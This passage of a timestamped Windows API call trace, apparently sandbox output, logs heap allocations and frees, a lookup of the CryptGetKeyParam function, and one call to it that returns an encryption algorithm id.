0x43e28a0 [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0119.492] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0119.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0119.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0119.493] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.493] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0119.493] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0119.493] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.494] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0119.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0119.494] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0119.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0119.495] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0119.495] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0119.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0119.496] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0119.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0119.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0119.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0119.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0119.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0119.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0119.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796de8 [0119.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0119.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0119.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0119.500] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0119.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0119.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0119.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0119.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0119.501] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e28f0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e28f0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: 